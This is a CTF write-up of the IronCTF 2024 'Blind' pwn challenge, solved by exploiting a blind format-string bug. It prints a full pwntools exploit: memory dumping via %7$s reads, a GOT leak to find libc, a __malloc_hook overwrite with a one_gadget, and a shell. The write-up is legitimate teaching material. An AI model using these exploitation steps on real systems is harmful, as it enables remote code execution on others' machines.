IronCTF 2024 - Blind
This is my Write-up for IronCTF 2024 - Blind
IronCTF 2024 - Blind
- Category: Pwn.
- Points: 500
- Solves: 4
- Author: Vigneswar
This weekend, I participated in Iron CTF 2024. Unfortunately, due to last-minute personal issues, I couldn’t dedicate much time to it. However, there were some great challenges, and as always, I focused on the PWN category. One challenge I couldn’t finish in time caught my interest, so I decided to complete it later. Here, I will explain how I solved it.
Description
The challenge description says: “Seriously?! Is blind pwn even possible? Only one way to find out :)”
This time we have neither code nor any files that we can decompile. We only have a host and a port to connect to. When we connect, we receive a prompt where we can write whatever we want in an infinite loop until some timeout ends the process.
The objective is clear. As the name of the challenge suggests, we need to carry out a blind exploitation.
First Steps
My first step was to find the bug. The first thing that came to mind was to try to trigger a buffer overflow by entering a long string. However, it seems that this was not the case. Next, I checked for a potential format string vulnerability.
1
2
3
4
➜ CTFs nc pwn.1nf1n1ty.team 32739
Its too dark here...
>>> %p.%p.%p.%p
0x7fffa8637bc0.0x3e8.0x7fb065a5d031.0x4
Bingo!!! The vulnerability exists! Knowing that the program is vulnerable to format strings, I created the following function to dump what’s on the stack to see if I could find something interesting.
1
2
3
4
5
6
7
8
def dump_format(start, end):
p = remote(HOST, PORT)
payload = ''
for i in range(start, end):
payload += f'{i}=%{i}$p\n'
p.sendlineafter(b'>>> ', payload)
print(p.recvuntil(b'>>> ').decode())
p.close()
1
2
3
4
5
6
7
8
9
10
11
12
13
125=(nil)
126=(nil)
127=(nil)
128=(nil)
129=(nil)
130=(nil)
131=0x18d48647e059c200
132=0x400760
133=0x7fa6ed702c87
134=0x1
135=0x7ffeb87ddae8
136=0x100008000
137=0x4006ca
There, something interesting is already visible. At offset 131, there is clearly what appears to be a stack canary. From this, I deduce that offset 132 will be RBP and then offset 133 will be the return address of the function, probably __libc_start_main + (unknown offset)
. You can also see several addresses that seem to belong to the .text section of the file, such as those at offsets 132 and 137. These addresses also indicate that the file is not protected by PIE. And the address at offset 135 is probably a stack address. I haven’t found anything in the stack that resembles what could be a flag.
The Plan
My plan will be as follows. I will try to dump the program’s code using format strings. This will allow me, in addition to understanding what I’m facing, to see if there’s a win function. If there isn’t a win function, I will try to obtain a leak from libc to determine which version of GLIBC is being used, allowing me to use the necessary gadgets from there. Depending on what I obtain, I will decide how to proceed.
I make use of the following function to try to dump what is in the range from address 0x400000 to 0x401000.
To do this, this function uses the format string %7$s to dereference what is in addr. If I receive an empty string, I assume it is a NULL byte; otherwise, I take the first byte and increment addr by 1. Since the server has a timeout, a new connection must be made when the current one closes.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
def read_addr(p, addr):
payload = b'%7$s\x00\x00\x00\x00'
payload += p64(addr)
p.sendline(payload)
return p.recvuntil(b'>>> ')[:-4]
def leak_section(start_addr, size):
code = b''
idx = 0
print(f"[i] Leaking Section {hex(start_addr)} - {hex(start_addr+size)}")
while(len(code) < size):
try:
res = read_addr(p, start_addr + idx)
if (res == b''):
code += b'\x00'
else:
code += res[0:1]
idx += 1
except:
p = remote(HOST, PORT)
p.recvuntil(b'>>> ')
print("[i] ADDR:", hex(start_addr+idx))
return code
def dump_qwords(buff):
for q in range(0, len(buff), 8):
qword = u64(buff[q:q+8])
print(f"{hex(q)}\t{hex(qword)}\n")
code = leak_section(0x400000, 0x1000)
print(disasm(code))
And here is the most interesting part. The program code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
687: 55 push rbp
688: 48 89 e5 mov rbp, rsp
68b: 48 8b 05 8e 09 20 00 mov rax, QWORD PTR [rip+0x20098e] # 0x201020
692: b9 00 00 00 00 mov ecx, 0x0
697: ba 02 00 00 00 mov edx, 0x2
69c: be 00 00 00 00 mov esi, 0x0
6a1: 48 89 c7 mov rdi, rax
6a4: e8 e7 fe ff ff call 0x590
6a9: 48 8b 05 60 09 20 00 mov rax, QWORD PTR [rip+0x200960] # 0x201010
6b0: b9 00 00 00 00 mov ecx, 0x0
6b5: ba 02 00 00 00 mov edx, 0x2
6ba: be 00 00 00 00 mov esi, 0x0
6bf: 48 89 c7 mov rdi, rax
6c2: e8 c9 fe ff ff call 0x590
6c7: 90 nop
6c8: 5d pop rbp
6c9: c3 ret
6ca: 55 push rbp
6cb: 48 89 e5 mov rbp, rsp
6ce: 48 81 ec f0 03 00 00 sub rsp, 0x3f0
6d5: 64 48 8b 04 25 28 00 00 00 mov rax, QWORD PTR fs:0x28
6de: 48 89 45 f8 mov QWORD PTR [rbp-0x8], rax
6e2: 31 c0 xor eax, eax
6e4: b8 00 00 00 00 mov eax, 0x0
6e9: e8 99 ff ff ff call 0x687
6ee: 48 8d 3d ef 00 00 00 lea rdi, [rip+0xef] # 0x7e4
6f5: e8 56 fe ff ff call 0x550
6fa: 48 8d 85 10 fc ff ff lea rax, [rbp-0x3f0]
701: ba e8 03 00 00 mov edx, 0x3e8
706: be 00 00 00 00 mov esi, 0x0
70b: 48 89 c7 mov rdi, rax
70e: e8 5d fe ff ff call 0x570
713: 48 8d 3d df 00 00 00 lea rdi, [rip+0xdf] # 0x7f9
71a: b8 00 00 00 00 mov eax, 0x0
71f: e8 3c fe ff ff call 0x560
724: 48 8d 85 10 fc ff ff lea rax, [rbp-0x3f0]
72b: ba e8 03 00 00 mov edx, 0x3e8
730: 48 89 c6 mov rsi, rax
733: bf 00 00 00 00 mov edi, 0x0
738: e8 43 fe ff ff call 0x580
73d: 48 8d 85 10 fc ff ff lea rax, [rbp-0x3f0]
744: 48 89 c7 mov rdi, rax
747: b8 00 00 00 00 mov eax, 0x0
74c: e8 0f fe ff ff call 0x560
751: eb c0 jmp 0x713
A very typical program in CTFs. First, stdin and stdout are set as unbuffered, something is printed, and 0x3e8 bytes are read into the stack. This repeats in a loop until the server closes. There’s no buffer overflow or win function.
Leaking Libc
I need to know which version of GLIBC is being used, as well as its base address. For that, I need at least the leak of two known addresses from libc. I’m going to try to read them from the GOT section.
I know this part is the call to printf:
1
2
3
4
73d: 48 8d 85 10 fc ff ff lea rax, [rbp-0x3f0]
744: 48 89 c7 mov rdi, rax
747: b8 00 00 00 00 mov eax, 0x0
74c: e8 0f fe ff ff call 0x560
Therefore, at offset 0x560 will be the printf PLT.
1
2
3
560: ff 25 6a 0a 20 00 jmp QWORD PTR [rip+0x200a6a] # 0x200fd0
566: 68 01 00 00 00 push 0x1
56b: e9 d0 ff ff ff jmp 0x540
So at address 0x400000 + 0x200fd0, there will be printf GOT.
With this function I have an arbitrary read and I can read printf GOT:
1
2
3
4
5
6
7
8
9
10
11
12
def arb_read(addr):
content = b''
for i in range(8):
payload = b'%7$s\x00\x00\x00\x00'
payload += p64(addr + i)
p.sendline(payload)
leaked_byte = p.recvuntil(b'>>> ')[:-4]
if leaked_byte == b'':
content += b'\x00'
else:
content += leaked_byte[0:1]
return u64(content)
Doing the same with another function, such as read, I obtain two known addresses from libc. Then, with a libc database like this one https://libc.rip/, I can determine that GLIBC 2.27 is being used, exactly the same version as in the challenge of this CTF called SimpleNotes. Therefore, from here, I will use that same libc. This also allows me to compute the libc base.
Exploitation
For the exploitation, I will take advantage of the fact that the version of GLIBC is a bit old and malloc hooks can still be used. I will write the address of one_gadget to __malloc_hook, and when I call malloc, I should get a shell.
1
2
3
4
5
6
7
# Overwriting malloc_hook with one_gadget
one_gadget = libc.address + 0x10a2fc
malloc_hook = libc.sym.__malloc_hook
write = {malloc_hook : one_gadget}
payload = fmtstr_payload(6, write, write_size='short')
p.sendline(payload)
Finally, I just need to call malloc so that it executes one_gadget. But how do I call malloc if malloc is not used in the code?
As explained in the following post, when printf is called with a sufficiently large amount of bytes, it internally calls malloc.
1
2
3
# Force call malloc.
payload = b'%100000c'
p.sendlineafter(b'>>>', payload)
And with this, I finally get a shell and the flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
➜ blind ./exploit.py
[*] '/home/elchals/CTFs/IronCTF/blind/libc.so.6'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
Stripped: No
Debuginfo: Yes
[+] Opening connection to pwn.1nf1n1ty.team on port 32739: Done
[i] Printf GOT: 0x7fc225735e40
[i] Read GOT: 0x7fc2257e1020
[i] Libc Base: 0x7fc2256d1000
[*] Switching to interactive mode
$ ls
flag.txt
ld-linux-x86-64.so.2
libc.so.6
run
$ cat flag.txt
ironCTF{Haha_You_Found_me_b1ind}
Final Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#!/bin/python3
from pwn import *
context.log_level = 'INFO'
context.terminal = ['remotinator', 'vsplit', '-x']
context.arch = 'amd64'
######################################################################################
HOST = "pwn.1nf1n1ty.team"
PORT = 32739
libc = ELF('./libc.so.6')
######################################################################################
def dump_format(start, end):
p = remote(HOST, PORT)
payload = ''
for i in range(start, end):
payload += f'{i}=%{i}$p\n'
p.sendlineafter(b'>>> ', payload)
print(p.recvuntil(b'>>> ').decode())
p.close()
def read_addr(p, addr):
payload = b'%7$s\x00\x00\x00\x00'
payload += p64(addr)
p.sendline(payload)
return p.recvuntil(b'>>> ')[:-4]
def leak_section(start_addr, size):
code = b''
idx = 0
print(f"[i] Leaking Section {hex(start_addr)} - {hex(start_addr+size)}")
while(len(code) < size):
try:
res = read_addr(p, start_addr + idx)
#print(code)
if (res == b''):
code += b'\x00'
else:
code += res[0:1]
idx += 1
except:
p = remote(HOST, PORT)
p.recvuntil(b'>>> ')
print("[i] ADDR:", hex(start_addr+idx))
return code
def arb_read(addr):
content = b''
for i in range(8):
payload = b'%7$s\x00\x00\x00\x00'
payload += p64(addr + i)
p.sendline(payload)
leaked_byte = p.recvuntil(b'>>> ')[:-4]
if leaked_byte == b'':
content += b'\x00'
else:
content += leaked_byte[0:1]
return u64(content)
######################################################################################
# Dump Stack content
#dump_format(100, 150)
#code = leak_section(0x400000, 0x1000)
#print(disasm(code))
# Leaking Libc Base address
p = remote(HOST, PORT)
p.recvuntil(b'>>> ')
printf_got = arb_read(0x400000 + 0x200fd0)
print("[i] Printf GOT:", hex(printf_got))
read_got = arb_read(0x400000 + 0x200fe0)
print("[i] Read GOT:", hex(read_got))
libc.address = printf_got - libc.sym.printf
print("[i] Libc Base:", hex(libc.address))
# Overwriting malloc_hook with one_gadget
one_gadget = libc.address + 0x10a2fc
malloc_hook = libc.sym.__malloc_hook
write = {malloc_hook : one_gadget}
payload = fmtstr_payload(6, write, write_size='short')
p.sendline(payload)
# Force call malloc.
payload = b'%100000c'
p.sendlineafter(b'>>>', payload)
p.interactive()
References
- One Gadgets and Malloc Hook: https://ir0nstone.gitbook.io/notes/binexp/stack/one-gadgets-and-malloc-hook